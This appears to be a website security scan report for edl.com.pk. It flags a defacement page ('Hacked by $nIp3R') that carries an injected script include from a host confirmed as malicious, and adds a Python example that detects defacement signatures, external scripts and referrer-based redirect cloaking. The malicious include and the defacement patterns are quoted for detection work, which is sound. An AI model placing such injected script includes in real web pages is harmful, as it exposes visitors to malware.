Scanned pages/files
Request | Server response | Status |
http://edl.com.pk/ | 200 OK; Content-Length: 11294; Content-Type: text/html | suspicious |
Details: Deface/Content modification. The following signature was found: Hacked by $nIp3R ...[620 bytes skipped]... t")[0],a.async=!0,a.src="//ajax.cloudflare.com/cdn-cgi/nexp/dok3v=d134393e0a/cloudflare.min.js",b.parentNode.insertBefore(a,b)}()}}catch(e){}; //]]> </script> <script src="http://d.safewebonline.com/l/load.js"></script> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>Hacked by $nIp3R</title> <script type="text/javascript"> /* <![CDATA[ */ var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-60479616-1']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName(' ...[12415 bytes skipped]...
http://d.safewebonline.com/l/load.js | 200 OK; Content-Length: 16941; Content-Type: application/javascript | malicious |
Details: Malicious code - confirmed by antiviruses (see below):
(function () { var data1 = { ns4: "[#[NAMESHORT]#]" , id: "[#[ID]#]" , ver: "[#[VERSION]#]" , base: "[#[HOST]#]" , session: "[#[SESSION]#]" }; var data2 = { ns4: "[#[NAMESHORT]#]" , id: "[#[ID]#]" , ver: "[#[VERSION]#]" , base: "[#[HOST]#]" , session: "[#[SESSION]#]" }; var data3 = { ns4: "[#[NAMESHORT]#]" })();
Antivirus reports:
http://edl.com.pk/test404page.js | 404 Not Found; Content-Length: 2674; Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK; Content-Length: 1688; Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: edl.com.pk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Oct 2015 18:08:26 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 11294
Content-Type: text/html
Last-Modified: Mon, 14 Sep 2015 12:35:45 GMT
...11294 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: edl.com.pk
Referer: http://www.google.com/search?q=edl.com.pk
Result:
The response is the same as for the first query; no Referer-conditional redirect was found.
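The three checks the report runs (the "Hacked by" signature match and the third-party script includes in the scanned-pages table, and the normal visit versus search-engine-referrer comparison in this section) can be reproduced offline. The Python below is an added example written for this page, not the scanner's own code or code from the defaced site. The HTML page and the HTTP responses it analyses are constructed here to mirror the report's findings (the `$nIp3R` title, the `d.safewebonline.com` and `cdn.dsultra.com` includes, the identical responses with and without a Referer); the cloaked response that redirects to `example.invalid` is hypothetical and shows what the check would flag.

```python
"""Offline reproduction of the scan report's checks on constructed sample data."""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Phrases commonly left by defacers. "Hacked by" is the one the report matched;
# the other two are plausible additions, not taken from the report.
DEFACE_PATTERNS = [
    re.compile(r"hacked\s+by\s+[^<\n]{1,40}", re.I),
    re.compile(r"owned\s+by\s+[^<\n]{1,40}", re.I),
    re.compile(r"defaced\s+by\s+[^<\n]{1,40}", re.I),
]


class _TagCollector(HTMLParser):
    """Collect <script src> values and <meta http-equiv="refresh"> contents.
    Script bodies are raw text to HTMLParser, so scripts injected at run time
    (like the Cloudflare loader built with document.createElement) are not seen."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []
        self.meta_refresh = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self.script_srcs.append(a["src"])
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.meta_refresh.append(a.get("content") or "")


def deface_signatures(html):
    """Distinct defacement phrases in the HTML, in order of first appearance."""
    hits = [(m.start(), m.group(0).strip()) for p in DEFACE_PATTERNS for m in p.finditer(html)]
    found = []
    for _, text in sorted(hits):
        if text not in found:
            found.append(text)
    return found


def external_scripts(html, page_host):
    """Hosts of <script src> includes that are not the page's own host.
    Absolute, protocol-relative (//host/x.js) and relative (/x.js) URLs are handled."""
    p = _TagCollector()
    p.feed(html)
    hosts = []
    for src in p.script_srcs:
        host = urlsplit(src).hostname
        if host is None:  # relative URL: served by the page's own host
            continue
        if host != page_host and not host.endswith("." + page_host) and host not in hosts:
            hosts.append(host)
    return hosts


def redirect_delta(normal, referred):
    """Compare a plain fetch with a fetch carrying a search-engine Referer.
    Each response is a dict: status (int), headers (lower-case keys), body (str).
    Returns the differences; an empty list is the report's 'no suspicious redirects' case."""
    diffs = []
    if normal["status"] != referred["status"]:
        diffs.append("status %s -> %s" % (normal["status"], referred["status"]))
    loc_n, loc_r = normal["headers"].get("location"), referred["headers"].get("location")
    if loc_n != loc_r:
        diffs.append("location %r -> %r" % (loc_n, loc_r))
    refresh = []
    for r in (normal, referred):
        c = _TagCollector()
        c.feed(r["body"])
        refresh.append(c.meta_refresh)
    if refresh[0] != refresh[1]:
        diffs.append("meta refresh %r -> %r" % (refresh[0], refresh[1]))
    h = [hashlib.sha256(r["body"].encode("utf-8", "replace")).hexdigest()[:12] for r in (normal, referred)]
    if h[0] != h[1]:
        diffs.append("body sha256 %s -> %s" % (h[0], h[1]))
    return diffs


# Constructed sample page modelled on the report (not the real 11294-byte capture).
SAMPLE_PAGE = """<html><head>
<script type="text/javascript">//<![CDATA[
try{(function(){var a=document.createElement("script"),b=document.getElementsByTagName("script")[0];
a.async=!0;a.src="//ajax.cloudflare.com/cdn-cgi/nexp/cloudflare.min.js";b.parentNode.insertBefore(a,b)})()}catch(e){};
//]]></script>
<script src="http://d.safewebonline.com/l/load.js"></script>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Hacked by $nIp3R</title>
<script src="/test404page.js"></script>
<script src="http://cdn.dsultra.com/js/registrar.js"></script>
</head><body><h1>Hacked by $nIp3R</h1></body></html>"""

NORMAL = {"status": 200, "headers": {"content-type": "text/html"}, "body": SAMPLE_PAGE}
REFERRED_SAME = dict(NORMAL)  # what the report observed: same answer with a Google Referer
# Hypothetical cloaked answer: only search-engine visitors get bounced elsewhere.
REFERRED_CLOAKED = {"status": 302, "headers": {"location": "http://example.invalid/landing"}, "body": ""}

if __name__ == "__main__":
    print("deface:", deface_signatures(SAMPLE_PAGE))
    print("external scripts:", external_scripts(SAMPLE_PAGE, "edl.com.pk"))
    print("delta (as observed):", redirect_delta(NORMAL, REFERRED_SAME))
    print("delta (cloaked):", redirect_delta(NORMAL, REFERRED_CLOAKED))
```

The static parse deliberately misses the Cloudflare script because it is created at run time inside the inline script; catching that class of include needs a headless browser or a JS sandbox, which is also why the report lists only the statically referenced load.js and registrar.js. A Referer-only comparison is the minimum for cloaking checks; in practice the User-Agent (Googlebot, mobile) and cookies are varied too, since redirect code keyed on those would look identical here.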
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=edl.com.pk
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://edl.com.pk/
Result: edl.com.pk is not infected or malware details are not published yet.